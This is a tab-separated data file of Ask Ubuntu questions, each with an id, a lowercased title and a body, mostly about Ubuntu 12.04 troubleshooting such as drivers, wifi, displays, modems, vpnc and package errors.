167792	wifi not working after installing updates on 12.04 lts	yesterday , i 've installed ubuntu desktop 12.04 lts ( using windows installer wubi ) on my samsung np300e4z-a06in laptop . at first everything was fine . but it showed that there were some updates available ( around 306mb ) . after installing the updates , its not connecting to wifi . i tried to connect but wo n't succeed . please help me out . i am new in the world of linux .
167800	how to have two sets of shortcut keys for compiz grid commands `` put left '' and `` put right '' ?	i would like to have two shortcuts each for `` put left '' and `` put right '' for positioning windows in the left and right position . specifically , i would like the default keys as well as some custom keys that are more accessible when typing : i.e . : put left : < control > < alt > kp4 and < shift > < alt > h put right : < control > < alt > kp6 and < shift > < alt > l the compizconfig dialogue box appears to only allow one shortcut key to be assigned . how can i have two shortcut keys enabled for a single grid compiz-config setting ?
167803	setting noapic , nolapic and nomodeset at time of installation results in non-responsive keyboard	i need to install nvidia drivers on my new desktop . for this i was told that while installing ubuntu i should cross the options `` noapic '' , `` nolapic '' and `` nomodeset '' so that nouveau drivers are not installed . i did that and after installation machine is not taking any input from keyboard at all . also i can move mouse cursor on screen but left/right clicks are not working . i have tried installing 3 times with same procedure but with same result . keyboard works properly at time of installation so keyboard is definitely not a problem . so my questions are : 1 . is is correct to cross these options while installing ubuntu if one wants to install nvidia drivers ? 2 . if answer to above question is yes , then what can be possible reason that mouse/keyboard not working ?
167814	hiding all files on desktop ?	i always had my desktop folder empty , and so i deleted it . after restart , nautilus decided that it should use my home folder as a base , and now my desktop is cluttered with files from my home folder . i tried recreating desktop folder , nothing changed . i tired setting apps/nautilus/preferences/desktop_is_home_dir key to true or false in gconf-editor , but nothing changed . also , i tried setting apps/nautilus/preferences/show_desktop key to false , it did hide all the icons , but also screws some visual effects . is there some way to convince nautilus back to using ~/desktop folder as a base folder for desktop ?
167815	do i have to connect my laptop to a switch/router before a virtual os ( ubuntu ) installed on virtualbox could communicate with the hosting os ( win7 ) ?	i selected the bridged adapter , and it would normally work fine when my laptop is connected to my wireless router . i just use the ip address of eth0 resulted from command ifconfig . but this morning , after i failed to authenticate myself to the library 's free wifi , i was trying to telnet from my hosting os to the virtual os and found that there was no ip address of eth0 . i tried configuring an ip address to eth0 using command sudo ifconfig eth0 x.x.x.x and setting an ip ( which was in the same subnet as the previous one ) to the hosting os as well . but after all this , it still wo n't work . is it because a switch or router is needed to assign ip addresses to the interfaces ?
167818	using pipe with bundle show and gnome-open	( i asked an almost identical question on stackoverflow with no response . am hoping that ask ubuntu is a better spot for this and so am re-asking here . ) i have n't used pipe much and am wondering if i 'm doing something wrong . if i run : bundle show jquery-rails i get the following : /home/u1104/.rvm/gems/ruby-1.9.3-p194/gems/jquery-rails-2.0.0 and if i run : gnome-open /home/u1104/.rvm/gems/ruby-1.9.3-p194/gems/bootstrap-sass-2.0.0 nautilus opens to the correct location . so i want to save myself the trouble of copying and pasting the results of one command into the other and i thought this was what the pipe was for ... but when i run the following : bundle show jquery-rails | gnome-open i get the following error : usage : gnome-open < url > /home/u1104/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.4/lib/bundler/vendor/thor/shell/basic.rb:63 : in `flush ' : broken pipe ( errno : :epipe ) from /home/u1104/.rvm/gems/ruby-1.9.3-p194 @ global/gems/bundler-1.1.4/lib/bundler/vendor/thor/shell/basic.rb:63 : in `say' ... is there a way to get the results of my bundle show to automatically open in nautilus ?
167819	i 'm getting fsync failed error . why ?	i tried to change the tcp timestamps in ec2 instance ( which is ubuntu 12.04 ) . i opened up the editor and changed the value 1 from 0 . and when i tried to save the file i get this error : /proc/sys/net/ipv4/tcp_timestamps '' e667 : fsync failed i 'm very new to ubuntu . can anyone help me in this out ?
167831	how to add the necessary ports to apache ?	lubuntu is installed and all runs great - now i want to add apache or lamp . how to proceed ? i need to add all the important ports and the firewall . besides this i want to install the phpmyadmin . well is this hard to do ?
167832	brightness problem on a samsung 530u3b	i am using ubuntu 12.04 on a samsung 530u3b laptop . screen blinks on adjusting the brightness and cpu load grow up to 100 % . video device : intel ( r ) extreme graphics 3 controller . seems like it started after kernel upgrade to 3.2.0-27-generic-pae .
167833	normal user starts in ubuntu-2d look , guest session in 3d	currently i 'm having a kind of very strange problem . when i login as my default user , then unity , whatever i have chosen in start-up dialog , starts with ubuntu-2d . that 's exactly what echo $ desktop_session confirms . also , compiz is not started . when i however decide to login via guest session , unity starts just fine in 3d-mode . /usr/lib/nux/unity-support-test -p confirms that unity 3d is supported . ( yes , for each line . ) i 'm using ubuntu 12.04 with an ati/amd radeon hd 3200 with proprietary fglrx drivers . problem was appearing after i updated unity and compiz . before everything just worked fine . what still works is starting compiz by myself , but then i have two side bars , which are overlapping and so not looking fine . i also tried to put compiz into autostart , but then starting my computer is taking much time and i 'm still having that overlapping-problem .
167834	how do i stream to twitch.tv ?	i am using the latest updated ubuntu 12.04 and i would like to know how i can stream my second monitor to an rtmp address . ( twitch.tv ) is there any kind of streaming on linux i can set up , or an up to date guide that shows how to do it in 12.04 ?
167837	how can i make creating a pdfs collaboratively easier ?	files are often send around to coworkers as pdfs as the can be read everywhere . how can doing this be made easier ?
167840	how do i get a vodafone k3772-z usb modem working ?	i recently switched from win 7 to ubuntu 12.04 ... best day of my life : ) i have a question relating to my vodafone k3772-z usb modem . when i plug it in , the lights start flashing on the device , meaning that it is functional . in the network menu i get a `` wired network vodafone k3772-z disconnected '' . i have set up the a connection by using edit connections - > mobile broadband - > add , but in the add window the `` create a connection for this mobile device '' is blanked out and says `` any device '' . does anyone perhaps have an idea of what i could do to get it working ?
167841	how to force the installation of a modified .bin file ?	i modified a .bin file for the software elan so the path to one of my libraries is correct ( after installation , elan ca n't find the library because the path is not right ) . so i used emacs to correct this . but when i use the commands to install the .bin file : sudo chmod +x elan_440_linux_novm_install.bin ./elan_440_linux_novm_install.bin i get the error message : preparing to install ... extracting the installation resources from the installer archive ... the size of the extracted files to be installed are corrupted . please try to download the installer again and make sure that you download using 'binary ' mode . please do not attempt to install this currently downloaded copy . this is probably because i added a few characters to the problematic string . is there a way to force the installation , as i know that the file was n't corrupted before i edited it ?
167842	what can i use to combine songs ?	sometimes you have songs you 'd like played together - concept albums , songs which have a part 1 and part 2 , and so on . is there a way to merge songs in banshee to achieve this ? or an option to always play a set of songs together ? or do i have to separately merge those files ? in that case , what is the lightest , simplest software to use ? i 'm looking for a simple tool . i do n't need a dj kit - just a merger , nothing more as i wo n't be using it very often .
167844	how do i download the .deb file from software center ?	i have an asus k52f and the web cam is mounted upside down . so i have to do a workaround for the web cam to show a proper image . but the problem is , this workaround only works with skype 2.x versions . and skype recently updated to 4.x versions . in the ubuntu repositories i.e . the software center , they still have the 2.x version . how do i get the .deb file from the software center so that i could save it and use it in case ubuntu updates its repositories ?
167847	how to run bash script as root with no password ?	i want to run a bash script as root with no password prompt . i tried visudo with no luck ( your_username all= ( all ) nopasswd : /path/to/your/script ) . it seems to me the only way out there , is there any other ?
167850	why i ca n't run the script against localhost ?	i have script which reads from method file : options and checks whether the options is allowed on a particular site . the script is : # ! /bin/bash # # if [ ! $ # == 1 ] then echo `` usage : $ 0 [ url ] '' exit 1 fi cat method | while read line do cat < < __eof > header $ line / http/1.1 host : $ 1 __eof nc $ 1 80 < header done so i can run this test against google.com and other sites . but when i run against localhost:8080 i get an error : nc : getaddrinfo : name or service not known i 'm very new to scripting . can anyone help me out ?
167854	how do i install another distro over ubuntu ?	i am pretty new at this , and i understand this is a pretty novice question but i am wanting to erase ubuntu on my laptop ( not enough ram or hard-drive ) and install a smaller distro over ubuntu . i have the iso and it is actually mounted . it appeared as if i was getting pretty close . i thought i would need to run the file inside the `` install '' folder ( pretty logical right ? ... especially since it 's the only file there ... ) but nothing happens when i click it . any ideas ? i appreciate it .
167859	ubuntu 12.04 freezes after login with 3 screens not mirrored . ati radeon hd 6870	i have 3 screens that runs on 1 ati radeon hd 6870 . i tried to turn of mirror mode but it gave me the following errors : the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 4800 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) . failed to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : required virtual size does not fit available size : requested= ( 4800 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) after that i installed the ati catalyst driver 12.6 and changed it in catalyst . it asks for a reboot to take effect . after the reboot it seems to work for the passwordbox is only on the main screen . but as soon as i entered my password . the main screen goes black and my kb & ms is unresponsive . i ca n't open a tty or anything . i updated the kernel to 3.4 but then i could n't install the catalyst driver so i then went to 3.3.6. but it still freezes after the password is entered . i can login through tty . here is my xorg.conf file : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-dfp5 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x900 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 1600 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp11 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x900 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 3200 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp10 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x900 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-dfp5 '' `` 0-dfp5 '' option `` monitor-dfp11 '' `` 0-dfp11 '' option `` monitor-dfp10 '' `` 0-dfp10 '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 virtual 4800 1600 depth 24 endsubsection endsection please help . 3 mirrored displays are n't useful .
167860	second monitor full screen flash problem 12.04	i occasionally plug in a second larger monitor to watch videos , what happens is that when i full screen the flash video it jumps to the width of both the screens put together and wo n't snap to the larger second screen . any ideas on how to get flash to work properly ? by the way i have ubuntu 12.04 x64 on an asus k52n
167867	how to get rid of unused jfscommit processes ?	on a dell poweredge t620 with xeon hexacore processor , i notice that there are 14 extraneous processes for the jfs filesystem . on another server , there are similar processes for the xfs filesystem as well . though they do n't cause any problem or significant load , i would like to get rid of these processes since i use neither jfs nor xfs . here are the relevant parts of the ps ax output : 31611 ? s 0:00 [ jfsio ] 31612 ? s 0:00 [ jfscommit ] 31613 ? s 0:00 [ jfscommit ] 31614 ? s 0:00 [ jfscommit ] 31615 ? s 0:00 [ jfscommit ] 31616 ? s 0:00 [ jfscommit ] 31617 ? s 0:00 [ jfscommit ] 31618 ? s 0:00 [ jfscommit ] 31619 ? s 0:00 [ jfscommit ] 31620 ? s 0:00 [ jfscommit ] 31621 ? s 0:00 [ jfscommit ] 31622 ? s 0:00 [ jfscommit ] 31623 ? s 0:00 [ jfscommit ] 31624 ? s 0:00 [ jfssync ] > uname -a linux ada 2.6.32-41-server # 89-ubuntu smp fri apr 27 22:33:31 utc 2012 x86_64 gnu/linux
167869	/etc/sudoers is owned by uid 777 , should be 0	when i use the command like : sudo setfacl -r -m u : www-data : rwx -m u : `whoami` : rwx app/cache app/logs i get an error like /etc/sudoers is owned by uid 777 , should be 0 . what should i do ?
167872	almost formatted my main disk with gparted . is it safe to reboot ?	while trying to format my usb key , i accidentally selected /dev/sda and proceeded to format the disk . luckily , the formatting was interrupted when gparted noticed the drive was currently mounted . however , i ca n't see the partitions anymore ( even when i restart gparted , i keep seeing this ) : i have n't rebooted yet as i am afraid to do so . at the moment , i can use my filesystem just fine but i 'm afraid that if i reboot some bad things might happen . what can i do to fix this ? is it safe to reboot ? update : i was attempting to create a bootable usb key for windows 7 so i clicked device/create partition table and selected `` msdos '' . i then attempted to create a primarty partition ( ntfs ) and got an error due to the fact that /dev/sda was already mounted . i 'm not sure where i can get an exact log . here 's the output of sudo fdisk -l : ➜ ~ sudo fdisk -l [ sudo ] password for olalonde : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001db65 device boot start end blocks id system /dev/sda1 1 60801 488384001 7 hpfs/ntfs disk /dev/sdb : 7998 mb , 7998537728 bytes 255 heads , 63 sectors/track , 972 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0005e98c device boot start end blocks id system /dev/sdb1 1 972 7807558+ 7 hpfs/ntfs as i said , my file system is correctly mounted so i can backup all my files but i 'd rather not go through that lengthy process if it is safe to reboot or if there 's a way to fix this before rebooting ... update 2 : output of mount and cat /proc/mounts : ➜ ~ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/olalonde/.private on /home/olalonde type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_sig=ee352762b400fa23 , ecryptfs_fnek_sig=70e5eee62e053b1b , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs ) gvfs-fuse-daemon on /home/olalonde/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=olalonde ) /dev/sda1 on /mnt type ext4 ( rw ) ➜ ~ cat /proc/mounts rootfs / rootfs rw 0 0 none /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 none /proc proc rw , nosuid , nodev , noexec , relatime 0 0 none /dev devtmpfs rw , relatime , size=2005108k , nr_inodes=501277 , mode=755 0 0 none /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 /dev/disk/by-uuid/bbf66c3f-ae71-4389-9f83-282e95ce6ee9 / ext4 rw , relatime , errors=remount-ro , barrier=1 , data=ordered 0 0 none /sys/fs/fuse/connections fusectl rw , relatime 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 none /dev/shm tmpfs rw , nosuid , nodev , relatime 0 0 none /var/run tmpfs rw , nosuid , relatime , mode=755 0 0 none /var/lock tmpfs rw , nosuid , nodev , noexec , relatime 0 0 none /lib/init/rw tmpfs rw , nosuid , relatime , mode=755 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , nosuid , nodev , noexec , relatime 0 0 /home/olalonde/.private /home/olalonde ecryptfs rw , relatime , ecryptfs_fnek_sig=70e5eee62e053b1b , ecryptfs_sig=ee352762b400fa23 , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs 0 0 gvfs-fuse-daemon /home/olalonde/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , relatime , user_id=1000 , group_id=1000 0 0 /dev/sda1 /mnt ext4 rw , relatime , errors=remount-ro , barrier=1 , data=ordered 0 0 update 3 : i am trying to use testdisk . can anyone confirm that i 'm doing this right and whether i should click that scary looking `` write '' ? ( selected n )
167877	howto install biber on ubuntu 12.04	i have solved it . it is necessary to install the latest binary from the `` development '' folder , extract the only file called `` biber '' and copy it to `` /usr/bin '' . the binary of the latest stable version 1.0 will not work though and show this error . slazer @ peter : ~/downloads $ tar xvf `` biber-linux_x86_64 ( 2 ) .tar.gz '' biber slazer @ peter : ~/downloads $ ./biber data source /tmp/par-736c617a6572/cache-fb3144567cd1381b403b18600c1ec4b232b2c018/inc/lib/biber/latex/recode_data.xml not found in . compilation failed in require at biber/utils.pm line 20 . begin failed -- compilation aborted at biber/utils.pm line 20 . compilation failed in require at biber/internals.pm line 8 . begin failed -- compilation aborted at biber/internals.pm line 8 . compilation failed in require at ( eval 22 ) line 2 . ... propagated at /usr/local/perl/lib/5.14.1/base.pm line 94 . begin failed -- compilation aborted at biber.pm line 5 . compilation failed in require at script/biber line 20 . begin failed -- compilation aborted at script/biber line 20 . what could be the problem ? i have 64 bit linux .
167886	how does one get an epson lx 300+ii to work with ubuntu 12.04 ?	in our office this printer works in systems those have older versions of ubuntu 10.04 . we are upgrading systems with this latest version 12.04 . so we are in trouble.we are unable to take printouts in new version systems.printer not working after upgrade to 12.04 .
167902	bbswitch does not work on asus a93s	i 've tried the suggestions given in an earlier answer to a similar question ( see elsewhere on askubuntu ) , but it does not work . both lsmod | grep nouveau lsmod | grep bbs come up empty . i am running precise on an asus a93s and installed bbswitch-dkms from the bumblebee/stable repository . help would be appreciated !
167903	failed to download ubuntu desktop 12.04 iso	i am trying to download ubuntu desktop iso from http : //www.ubuntu.com/download/desktop/thank-you ? distro=desktop & release=lts & bits=32 every time it stops the download after 142 mb while it is a 701 mb file . tell me what is the problem ?
167912	how to address ssh-server with a subdomain for remote access ?	i am trying to set up ssh-server on my ubuntu 12.04 vm ( running in virtualbox on mac os x 10.7 ) . i have a domain name , call it foo.com , and i 'd like to make ssh available via ssh to linux.foo.com . ( i want this to be accessible from outside the local network . ) how can i do this ? do i need a static ip address or is there a way to dynamically forward traffic ? thanks !
167915	unable to change display resolution	i have a dell laptop with a resolution of 1600 x 900 and i have a second monitor as dell 24 '' . the resolution that ubuntu is configured in a virtual box is 1024 * 800 . how can i fix the resolution on the dell monitor to get a higher resolution ?
167919	left speaker dropouts in ubuntu 12.04	i have the left speaker dropping out intermittently . it seems to be occurring after a boatload of updates ( including a kernel update ) today . i am sure it is ubuntu problem and not a hardware fault because using another input device it works ok . i can still hear a very faint sound from the left speaker , it is almost as if the balance is shifted very far to the right ( but i checked that slider , it 's in the center ) .
167928	alternative screen lock out to xscreensaver ?	in most operating systems like windows this was a nice feature , that when i walked away from the computer for the set amount of time - lets say 15 minutes - it would go into suspend . when i would press the power button it would bring me to the main `` greeter '' log in screen instead of having me enter a password at the screen saver . for some reason ubuntu uses the xscreensaver thing which does n't look right and should kick me to the lightdm greeter log in screen . can i set xorg to log me off when i 'm idle for a given amount of time and bypass xscreensaver ?
167930	how to customize the nautilus-actions ?	i installed nautilus-actions and nautilus-actions-extra and they have lots of cool and useful stuff for linux noobs like me who ca n't be bothered to learn the terminal , but my nautilus context menu does n't fit on the screen anymore . i read that you could choose which commands to show using the nautilus actions configuration tool , but when i start it , it shows a blank actions list . there is an import assistant , except i have no clue what kind of files i 'm supposed to import and where from . how do i get my installed actions to show ?
167931	xorg and virtualbox break after installing xen	i installed xen using these instructions https : //help.ubuntu.com/community/xen now when i rebooted virtualbox doesnt work , x doesnt work , lightdm doesnt work how can i set it back to how it was before ? i presume i want to revert the following actions : modify grub to default to booting xen : sudo sed -i 's/grub_default= . *\+/grub_default= '' xen 4.1-amd64 '' / ' /etc/default/grub sudo update-grub can someone tell me how ?
167936	empathy stop working	im getting a little problem with empathy . it suddenly stoped work , and im getting and error . i 've sented the report , but till now , there 's no resolution . my system is updated . im using ubuntu 12.04 . the error says : sorry , ubuntu presented an internal error i ca n't copy the stracktrace but it says something about libglib and other things.. is anyone experimenting this kind of problem ? thanks in advance !
167938	ubuntu 11.10 software center struck at `` applying changes '' and update manager wo n't proceed because of an installation error	i have an issue with this application called `` sandboxgamemaker '' . first of all , it did not install properly as the software center was struck at `` applying changes '' . when i opened the update manager in order to recover , it warned me to not to proceed without a 'partial update ' , which is of-course for the improperly installed sandboxgamemaker app . as i did , the update manager stopped responding and i thought of doing it manually . so i used the below command sudo dpkg -- configure -a both in the update manager and in the terminal , despite trying for all the given options of replace platinumartssandbox2.6.1/bin/jpeg.dll ? [ y ] es , [ n ] o , [ a ] ll , [ n ] one , [ r ] ename : i 'm struck here , as shown below processing triggers for python-central ... setting up sandboxgamemaker ( 2.6.1+dfsg-7 ) ... cleaned old data -- 2012-07-25 18:05:21 -- http : // sandboxgamemaker . com/sandbox/platinumartssandbox2.6.1multiplatform.zip resolving sandboxgamemaker.com ... 173.236.241.215 connecting to sandboxgamemaker.com|173.236.241.215|:80 ... connected . http request sent , awaiting response ... 301 moved permanently location : http : // www.sandboxgamemaker . com/sandbox/platinumartssandbox2.6.1multiplatform.zip [ following ] -- 2012-07-25 18:05:23 -- http : // www . sandboxgamemaker . com/ sandbox/platinumartssandbox2.6.1multiplatform.zip resolving www . sandboxgamemaker . com ... 173.236.241.215 reusing existing connection to sandboxgamemaker.com:80 . http request sent , awaiting response ... 416 requested range not satisfiable the file is already fully retrieved ; nothing to do . replace platinumartssandbox2.6.1/bin/jpeg.dll ? [ y ] es , [ n ] o , [ a ] ll , [ n ] one , [ r ] ename :
167939	keyboard layout switching behavior is n't right	i have two keyboard layouts : hebrew and english . the preferences are set to allow different layouts for individual windows and to open new windows with the default layout , but it does n't work that way , and it 's a little hard to explain exactly what happens . sometimes it switches the layout to all windows . sometimes it opens a new window , shows the previously active layout ( rather than the default ) , then when you minimize the window and maximize it again , it 's on the right layout . sometimes it displays that one layout is selected , but the actual typing is in the other layout . i believe that there are separate and overlapping problems in the keyboard layout settings and the keyboard layout indicator . they do not seem to communicate and work together properly , and the result is very confusing . i 'm certain this is a bug , and i 'd report it , except i 'm not sure about two things : one , whether there 's already such a bug report or not . i 've been searching one for a while , and i remember seeing something , only i ca n't find it now . two , which packages are responsible for the keyboard layout , that is , which packages should be reported . has anyone seen this before ? found something on launchpad ? has a fix ? if not , what packages are likely to cause this ?
167948	struggling to update repositories	i recently installed ubuntu using wubi on my windows 7 machine . i got the following message from terminal when i tried to use the sudo apt-get update command . i ca n't install codecs or anything . please help . e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
167949	unable to sync pgp keys seahorse	ok so i tried for the first time to use pgp keys for email encryption in evolution . i followed some instructions online , created a key , but coz i encountered some problems i decided to delete the key and restart the proces . ( this fact is probably irrelevant , because i got similar errors when doing it . ) now i have no key and i go to remote : sync and publish keys . firstly it says that there are 6 keys selected for synchronisation . why ? i do have some passwords saved in here , will it sync those too ? ? and last , when i click sync i first get two errors : could n't retrieve keys from server : pool.sks-keyservers.net could n't communicate with server 'pool.sks-keyservers.net ' : internal server error and could n't retrieve keys from server : keyserver.ubuntu.com:11371 could n't communicate with server 'keyserver.ubuntu.com:11371 ' : internal server error than the progress stops and no progress is made , it just says : synchronising keys ... exporting data any help ?
167955	taking kde config files with me	i 'm reinstalling my kubuntu 12.04 and i want to take my kate , kile , okular , dolphin & konsole config files with me . where are this files located ? i 've looked around /home/ , /home/.kde/ and /home/.config/ but found nothing .
167959	installation problem during boot	i have a hcl me laptop with the following hardware specifications : intel dual core t4200 @ 2.00ghz , 3gb ram , video card : nvidia geforce 8200m g , os : windows 7 ultimate 32 bit . when i am trying to install ubuntu 12.04 through a cd/usb drive , it will boot from start menu and after the welcome screen , it only shows me a cursor and nothing else . please help me out . is it possible to install ubuntu in my laptop or not ?
167965	gnome language selector refuses to set language	when i run gnome-language-selector as my normal user , i get the following output upon dragging and dropping a new language above the default english . /usr/lib/python2.7/dist-packages/languageselector/localeinfo.py:124 : unicodewarning : unicode equal comparison failed to convert both arguments to unicode - interpreting them as being unequal if lang_name == self._lang [ lang ] : debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : ikke tilgang debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : ikke tilgang debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : ikke tilgang debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : ikke tilgang traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 62 , in wrapper res = f ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 1047 , in on_treeview_locales_drag_end self.writeuserlanguage ( envlanguage ) file `` /usr/lib/python2.7/dist-packages/languageselector/gtk/gtklanguageselector.py '' , line 800 , in writeuserlanguage self.writeuserlanguagesetting ( userlanguage=languagestring ) file `` /usr/lib/python2.7/dist-packages/languageselector/languageselector.py '' , line 83 , in writeuserlanguagesetting iface.setlanguage ( userlanguage ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.accounts.error.failed : not access to home yet so language not saved ( ikke tilgang - > not allowed ) i said , okay , that seems like a permissions problem . so i re-run it as root and have the following error : $ sudo gnome-language-selector /usr/lib/python2.7/dist-packages/languageselector/localeinfo.py:124 : unicodewarning : unicode equal comparison failed to convert both arguments to unicode - interpreting them as being unequal if lang_name == self._lang [ lang ] : /usr/lib/python2.7/dist-packages/languageselector/languageselector.py:77 : userwarning : no language saved for user 'root ' . warnings.warn ( `` no language saved for user ' % s ' . '' % os.getenv ( 'user ' ) ) does anyone have any ideas what might be causing this ? or what i could do to debug/fix this problem ?
167969	can i use bash aliases in a keyboard shortcut ?	is it possible to use an alias within a custom shortcut ? for example , suppose i have the alias alias cal= '' google-chrome -- new-window calendar.google.com '' can i create a custom shortcut that binds `` ctrl+alt+c '' to `` cal '' ? i have tried but it does n't seem to work .
167971	how do i run a script from within the vim editor ?	when within vim ( the editor i use mostly because of the terminal integration ) , i want to run my script ( e.g . python or javascript ) from within vim . i do not mind if it opens a new window , i would just like to know if there is an editor command for save/run . tnx1.0e6 ,
167975	can a laptop have problems with ubuntu cause of hardware ?	hello i was always using ubuntu from 10.04 and now i have 12.04.. any version from 10.04 to 12.04 had appeared with many problems with ubuntu.. problems like , in 12.04 the sleep fuction when the laptop is reopened shows a black screen and i have to crash my laptop youtube was showing videos but faces of humans were in blue.. i have found here a solution from here . now another problem appeared which i ca n't explain or screenshot it . it like the video playing inside the video . another problem is that i had maaaany times problems with booting ubuntu.. like more than 10 times i have googled a solution so as to boot my ubuntu.. chromium opens after 10 seconds ( my friend 's laptop opens in 2-3 ) while on the other hand my friend using ubuntu from 9.04 he has like 0 problems.. so my question is this , can the hardware cause all of these problems ?
167979	iball 3.75g-72 connect mobile broadband usb modem not detected in ubuntu 12.04. how to detect that modem ?	i have bought new iball 3.75g modem to connect with ubuntu1 2.04 . but , ubuntu 12.04 does n't detect my device . i have already use gnome ppp tool to detect my modem . but , the tool could n't detect my modem and shows error message like `` no modem found '' . what can i do for this problem ? please help me . its urgent . i do n't find any answer yet . help . siva @ siva-xps-l501x : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 004 : id 0408:2fb1 quanta computer , inc . bus 003 device 002 : id 2020:0002
167987	weird vpnc connection problem - vpn works but http post bugs out	i have multiple ubuntu clients connecting trough vpnc to a cisco asa 5510 . the vpn connection is configured trough network-manager-vpnc-gnome . all clients ( separate user names and passwords , same group name and password ) connect fine , get issued a 10.77.22.x ip and are able to access the web server on same network . now here comes the fun part . although all clients can get web pages from said server , some of them ca n't post page updates ( like , user fills out text boxes , clicks save/submit ) . furthermore , if the web page with editable content is in the main browser window , it works on all clients . if the page is in a pop-up window , the page does n't get posted . tried this with chrome and firefox , both latest versions . tried it without any extensions enabled , incognito/private mode . all clients run ubuntu 11.10 , all up to date and all of them run the same firefox , chrome and vpnc versions . i have n't got admin access to the cisco box . the same two clients ca n't update pages regardless of their location ( different routers , cable , adsl , etc . ) while all others can regardless of location . so , i realize there 's no ready-made answer to this , i 'd appreciate some pointers as to how to debug/monitor traffic on a `` healthy '' machine and then compare it to the `` faulty '' ones .
167989	booting from a usb for hp laptop	i 'm trying to boot ubuntu from my usb , but my laptop stays stuck at the black `` hp '' screen . i 've tried tapping f9 to get to my boot menu , and even f10 to enter bios ... .but nothing seems to work . what should i do ? my notebook is an hp g61-429wm . i purchased a new harddrive so there is no current os . update : found an os disc for vista , going to try and install onto my notebook .
